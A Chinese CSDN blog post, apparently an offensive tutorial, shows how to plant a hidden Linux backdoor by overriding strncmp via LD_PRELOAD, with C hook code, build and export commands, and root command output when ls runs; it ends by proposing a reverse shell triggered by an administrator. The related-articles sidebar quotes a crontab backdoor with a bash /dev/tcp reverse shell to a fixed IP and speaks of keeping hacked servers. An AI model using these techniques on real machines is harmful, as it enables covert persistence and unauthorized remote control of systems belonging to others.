【权限维持】linux下使用动态链接库制作隐藏后门

最新推荐文章于 2023-06-12 11:54:15 发布
最新推荐文章于 2023-06-12 11:54:15 发布
阅读量354 收藏
点赞数
文章标签: 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Muxi_k/article/details/130214811
版权

什么是LD_PRELOAD

LD_PRELOAD 是 Linux/Unix 系统的一个环境变量,它影响程序的运行时的链接(Runtime linker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。

如何利用LD_PRELOAD

由于 LD_PRELOAD 可以指定在程序运行前优先加载的动态链接库,那我们可以重写程序运行过程中所调用的函数并编译成动态链接库文件,然后通过指定 LD_PRELOAD 让程序优先加载的这个恶意的动态链接库,最后当程序再次运行时便会加载动态链接库中的恶意函数。具体的操作步骤如下:

  1. 定义与目标函数完全一样的函数,包括名称、变量及类型、返回值及类型等。
  2. 将包含替换函数的源码编译为动态链接库。
  3. 通过命令 export LD_PRELOAD="库文件路径”,设置要优先替换动态链接库即可
  4. 替换结束,要还原函数调用关系,用命令unset LD_PRELOAD 解除

一个简单的后门思路

当我们得知了一个系统命令所调用的库函数 后,我们可以重写指定的库函数进行劫持。这里我们以 ls 命令为例进行演示。

  1. 首先查看 ls 这一系统命令会调用哪些库函数:
[root@154-91-90-68 ~]# readelf -Ws /usr/bin/ls

Symbol table '.dynsym' contains 129 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __uflow@GLIBC_2.2.5 (3)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND cap_to_text
     5: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND __progname@GLIBC_2.2.5 (3)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigprocmask@GLIBC_2.2.5 (3)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.2.5 (3)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.2.5 (3)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND localtime@GLIBC_2.2.5 (3)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __mempcpy_chk@GLIBC_2.3.4 (4)
    11: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.2.5 (3)
    12: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __errno_location@GLIBC_2.2.5 (3)
    13: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strncmp@GLIBC_2.2.5 (3)
    14: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND stdout@GLIBC_2.2.5 (3)
    15: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _exit@GLIBC_2.2.5 (3)
    16: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strcpy@GLIBC_2.2.5 (3)
    17: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __fpending@GLIBC_2.2.5 (3)
    18: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND isatty@GLIBC_2.2.5 (3)
    19: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigaction@GLIBC_2.2.5 (3)
    20: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND iswcntrl@GLIBC_2.2.5 (3)
  1. 重写函数库进行劫持

如上图所示可以看到很多库函数,我们随便选择一个合适的进行重写即可,这里我选择的是 strncmp@GLIBC_2.2.5

  • 编写hook_strncmp.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
    // 这个函数用来编写或运行你的后门程序
    system(“id”);
}

int strncmp(const char*__s1, const char*__s2, size_t __n) {
    // 这里函数的定义可以根据报错信息进行确定
    if(getenv("LD_PRELOAD") == NULL) {
        return 0;
    }   
    unsetenv("LD_PRELOAD");
    payload();
}
  • 执行命令编译生成 hook_strcmp.so
gcc -shared -fPIC hook_strncmp.c -o hook_strncmp.so
  • 通过环境变量 LD_PRELOAD 来设置 hook_strncmp.so 能被其他调用它的程序优先加载
export LD_PRELOAD=$PWD/hook_strncmp.so
  • 最后执行 ls 发现成功执行了 id 命令, 说明此时成功劫持了 strncmp 函数。
[root@154-91-90-68 /]# ls
uid=0(root) gid=0(root) groups=0(root)
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  patch  proc  root  run  sbin  srv  sys  tmp  usr  var  www

总结

利用这种思路,我们可以制作一个隐藏得 Linux 后门,比如当管理员执行 ls 命令时会反弹一个 Shell

Muxi_k
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux系统后门技术(隐藏帐户篇)注:已发表在《黑客手册》第6期
yxyhack's blog
09-25 1万+
  Linux系统后门技术(隐藏帐户篇)        每当我们欢天喜地的得到一个linux系统的服务器肉鸡时,最大的愿望就是能把它永远留住。当然,永远留住是不可能的,但是我们要尽量的不让它飞走。这就要用到linux后门技术了,这是项复杂的技术,本人水平有限不可能面面俱到,我只希望这一系列文章能为大家提供一点思路,在您hacking的道路上打开一扇方便之门!       言归
linux端口复用隐藏后门
m0_46799123的博客
09-14 523
端口复用实验
【一个Linux后门隐藏技巧】
qq_55213436的博客
08-15 1047
根据Linux的系统特性,经过一定的测试发现,Linux操作系对于如:xige.jpg .php类型的文件会识别为:xige.jpg类型的文件。这个是管理员最容易忽视的地方,所以我们只需要在访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php;但是管理员却很难辨认出该木马文件,我们只需要访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php,即可触发这个木马。......
LINUX后门--教程(五)—— crontab隐藏后门
W小哥
07-08 3261
2.3 留crontab隐藏后门 好不容易拿下一个网站,以后还想继续使用该系统,通常都会留下一些后门,本次我们留下一个crontab隐藏后门 我们把1.sh、2.sh 文件放在本地搭建的web服务上,让受害者去下载执行 1.sh文件内容 #!/bin/bash bash -i >& /dev/tcp/192.168.184.145/5555 0>&1 反弹shell到IP地址:192.168.184.145 2.sh文件内容 (crontab -l;printf "* * *
如何做一个简单的后门
07-11
加你怎么做简单后门,这是个非常简单的,要用到易语言。
LINUX下的openSSH后门制作.txt
最新发布
01-09
Linux系统安全学习
利用安全描述符隐藏服务后门进行权限维持1
08-03
cmd 创建启动服务sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\
Linux下查找后门程序 CentOS 查后门程序的shell脚本
01-20
每个进程都会有一个PID,而每一个PID都会在/proc目录下有一个相应的目录,这是linux(当前内核2.6)系统的实现。 一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经...
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt
04-21
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址,真实有效,亲测可用。
超初级的linux后门制作方法
09-16
本文将详细介绍超初级的 Linux 后门制作方法,包括 Linux 文件权限、SetUID、SetGID 和 Sticky Bit 等概念的详细解释和操作方法。 Linux 文件权限Linux 系统中的一个重要概念,它决定了文件的访问权限和所有权。...
后门程序制作示例+源码
03-08
程序后门制作程序后门制作程序后门制作程序后门制作
后门制作及安装技术(全)
【GTA: Vice City】
08-29 4189
后门制作及安装技术摘要  本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. (2002-09-16 13:30:19)后门   声明:此文为翻译文章,QiangGe只做了一些修改,并加入了一些自己的心得及自己所写的程序.  译者 iamtheguest  从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门
记一次隐藏动态库符号的探索过程
myctime的博客
03-02 3243
今天遇到一个需要隐藏动态库符号的需求,记录一下。 因为某些原因需要将定制的OPENSSL库进行封装成一个新的动态库,提供给其他用户使用。并且我们用到的这个OpenSSL库是经过改造的,与系统库里自带的OpenSSL是不相同的。 先贴出Makefile all:libsgcccrypto.a libsgcccrypto.so test crypto.o:crypto.h crypto.h ...
linux动态链接库导出函数控制,控制linux动态链接库(so, standard object)导出函数...
weixin_39637260的博客
05-12 212
参考:http://www.lampchina.net/article/htmls/201006/Mjg4MDMy.html注意:参考文献中有一些函数是不能编译通过的。编译环境:gcc 4.4.3在windows中,我们可以指定__declspec(dllexport)定义来控制导出函数,在linux下,我们也有类似的控制参数。在GCC帮助文档 -fvisibility=default|inter...
Linux 环境变量LD_PRELOAD
小立仔
06-12 2973
Linux使用 环境变量 LD_PRELOAD 简介以及使用其来 hook标准库中的函数
Linux使用readelf工具查看程序代码变量的内存空间布局情况
TinyHorse的博客
08-18 3463
内存空间布局
Linux环境下的LD_PRELOAD:库预加载
RToax
09-08 3427
LD_PRELOAD详解 RToax 2020年9月 1. LD_PRELOAD的作用 系统在运行过程中,会首先加载该环境变量指定的函数库(在libc.so之前加载),如果函数库内包含了程序中执行的函数名,该可执行文件的函数将被重定向到LD_PRELOAD指向的函数中。 2. LD_PRELOAD的一个示例 2.1. 生成malloc动态库 2.1.1. mymalloc.h #ifndef _mymalloc_h #define _mymalloc_h #include <sys/types.h
c语言调用c 方法,C语言代码中调用C++代码的方法示例
weixin_42298064的博客
05-22 473
由于历史原因,以及不同开发人员的技术偏好,C语言和C++语言都有一些独有的非常有价值的项目,因而两种语言的互操作,充分利用前人造的轮子是一件非常有价值的事情。C++代码调用C代码很简单,只要分别在包含的C头文件的开头和结尾加上如下的两个块:#ifdef __cplusplusextern "C" {#endif和#ifdef __cplusplus}#endif即可。然而为了支持类、重载等更加高级...
有趣的 LD_PRELOAD
天涯路的专栏
06-10 1385
LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。如果你是个 Web 狗,你肯定知道 LD_PRELOAD,并且网上关于 LD_PRELOAD 的文章基本都是绕过 disable_functions,都快被写烂了。今天我们就从浅入深完整的学习一下什么是 LD_PRELOAD,LD_PRELOAD 有什么作用,我们可以如何利用 LD_PRELOAD。程序的链接主要有以下三种:对于动态链接来说,
kali linux权限维持,权限维持篇-NC后门
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统...请注意,NC后门只是权限维持的一种方法,攻击者可能会使用其他技术来维持其访问权限,因此在Kali Linux中学习权限维持是至关重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值